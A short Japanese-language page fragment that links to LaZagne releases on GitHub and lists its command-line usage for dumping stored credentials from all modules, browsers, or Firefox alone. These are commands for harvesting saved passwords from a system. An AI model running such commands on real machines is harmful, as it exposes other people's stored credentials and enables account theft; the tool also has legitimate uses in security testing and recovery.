スタンドアロンバイナリは[こちら](https://github.com/AlessandroZ/LaZagne/releases/)からインストールできます。

**使用方法:**```bash
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

Read more

ツールをダウンロード